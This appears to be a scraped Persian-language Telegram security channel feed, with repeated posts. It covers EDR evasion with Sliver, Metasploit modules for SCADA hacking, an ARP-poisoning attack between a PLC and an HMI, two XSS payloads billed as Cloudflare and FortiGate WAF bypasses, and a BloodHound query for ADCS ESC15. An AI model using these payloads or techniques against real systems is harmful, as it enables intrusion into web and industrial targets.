https://github.com/MythicAgents/sliver/blob/main/blog/blog.md
شما می توانید از این فرآیند چیزهای زیادی بیاموزید، به عنوان مثال، از edr اجتناب کنید و سرورهای تیم را پیوند دهید
شما می توانید از این فرآیند چیزهای زیادی بیاموزید، به عنوان مثال، از edr اجتناب کنید و سرورهای تیم را پیوند دهید
GitHub
sliver/blog/blog.md at main · MythicAgents/sliver
Sliver agents for Mythic. Contribute to MythicAgents/sliver development by creating an account on GitHub.
SCADA Hacking: Metasploit SCADA Modules
به عنوان یک پنتستر/هکر ، ما منابع زیادی داریم که میتوانیم از آنها برای آزمایش امنیت سیستم SCADA/ICS استفاده کنیم. یکی از محبوب ترین آنها فریم ورک Metasploit است.
در اینجا، من سعی کرده ام لیستی از اکثر ماژول های Metasploit که برای آزمایش/هک کردن SCADA/ICS مفید هستند را گردآوری کنم. لطفاً به خاطر داشته باشید که سایتهای SCADA/ICS از سختافزار و پروتکلهای متنوعی استفاده میکنند، بنابراین شناسایی برای یک هک موفقیتآمیز حیاتی میشود. شما باید حداقل سازنده و پروتکل را بشناسید و سپس ماژول مناسب را از این لیست بیابید.
این اطلاعات در قالب زیر سازماندهی شده است.
ابزار/Exploit MSF-Update Developer/Vendor System(های) Metasploit مرجع
من معتقدم که اکثر این ستون ها با استثناهای احتمالی MSF-Update و System(s) توضیحی هستند.
ستون MSF-Update نشان می دهد که آیا ماژول هنگام به روز رسانی در Metasploit در دسترس است یا خیر. برخی از ماژول ها به طور خودکار به روز می شوند و به Metasploit Framework شما اضافه می شوند. برخی دیگر، احتمالاً باید به صورت دستی اضافه کنید.
@pfksecurity
به عنوان یک پنتستر/هکر ، ما منابع زیادی داریم که میتوانیم از آنها برای آزمایش امنیت سیستم SCADA/ICS استفاده کنیم. یکی از محبوب ترین آنها فریم ورک Metasploit است.
در اینجا، من سعی کرده ام لیستی از اکثر ماژول های Metasploit که برای آزمایش/هک کردن SCADA/ICS مفید هستند را گردآوری کنم. لطفاً به خاطر داشته باشید که سایتهای SCADA/ICS از سختافزار و پروتکلهای متنوعی استفاده میکنند، بنابراین شناسایی برای یک هک موفقیتآمیز حیاتی میشود. شما باید حداقل سازنده و پروتکل را بشناسید و سپس ماژول مناسب را از این لیست بیابید.
این اطلاعات در قالب زیر سازماندهی شده است.
ابزار/Exploit MSF-Update Developer/Vendor System(های) Metasploit مرجع
من معتقدم که اکثر این ستون ها با استثناهای احتمالی MSF-Update و System(s) توضیحی هستند.
ستون MSF-Update نشان می دهد که آیا ماژول هنگام به روز رسانی در Metasploit در دسترس است یا خیر. برخی از ماژول ها به طور خودکار به روز می شوند و به Metasploit Framework شما اضافه می شوند. برخی دیگر، احتمالاً باید به صورت دستی اضافه کنید.
@pfksecurity
P.F.K Security
SCADA Hacking: Metasploit SCADA Modules به عنوان یک پنتستر/هکر ، ما منابع زیادی داریم که میتوانیم از آنها برای آزمایش امنیت سیستم SCADA/ICS استفاده کنیم. یکی از محبوب ترین آنها فریم ورک Metasploit است. در اینجا، من سعی کرده ام لیستی از اکثر ماژول های Metasploit…
ستون System(s) سیستم های آسیب پذیر در برابر ماژول اکسپلویت/اسکنر را نشان می دهد. یک بار دیگر می خواهم بر ماهیت متنوع سیستم های SCADA/ICS تاکید کنم.
لطفاً توجه داشته باشید که ماژولها از ماژولهای بهرهبرداری و ماژولهای کمکی (عمدتاً برای recon استفاده میشوند) متفاوت هستند.
@pfksecurity
لطفاً توجه داشته باشید که ماژولها از ماژولهای بهرهبرداری و ماژولهای کمکی (عمدتاً برای recon استفاده میشوند) متفاوت هستند.
@pfksecurity
CLOUDFLARE BYPASS xss
PAYLOAD:
<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>
FortiGate WAF bypass
<details open ontoggle="(()=>alertibrahimxss)()"></details>
#exploit #bypass
@pfkSecurity
PAYLOAD:
<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>
FortiGate WAF bypass
<details open ontoggle="(()=>alertibrahimxss)()"></details>
#exploit #bypass
@pfkSecurity
BloodHound ADCS ESC15 (EKUwu) cypher query.
از این جستجوی رمزگذاری برای بررسی حقوق ثبت نام در قالبهای گواهی استفاده کنید که الزامات حمله ADCS ESC15 (EKUwu) را که اخیراً فاش شده است را برآورده میکند.
@PfkSecurity
از این جستجوی رمزگذاری برای بررسی حقوق ثبت نام در قالبهای گواهی استفاده کنید که الزامات حمله ADCS ESC15 (EKUwu) را که اخیراً فاش شده است را برآورده میکند.
MATCH p=(:Base)-[:Enroll|AllExtendedRights]->(ct:CertTemplate)-[:PublishedTo]->(:EnterpriseCA)-[:TrustedForNTAuth]->(:NTAuthStore)-[:NTAuthStoreFor]->(:Domain)
WHERE ct.enrolleesuppliessubject = True
AND ct.authenticationenabled = False
AND ct.requiresmanagerapproval = False
AND ct.schemaversion = 1
RETURN p
@PfkSecurity
This media is not supported in your browser
VIEW IN TELEGRAM
این ویدئو یک سناریوی "MITM" را نشان می دهد که بین PLC و HMI انجام شده است. این وکتور حمله نشان می دهد که چگونه می توان کنترل کامل یک موتور (دستگاه نقطه پایانی) را به دست آورد. پس از مسموم کردن یا همون poisoning جدول arp HMI و درج مقادیر جعلی، مقادیر مطلوب را مستقیماً به PLC ارسال کردند تا نمایشی نادرست (مشابه نتایج حمله استاکس نت) ایجاد کنند.
@PfkSecurity
@PfkSecurity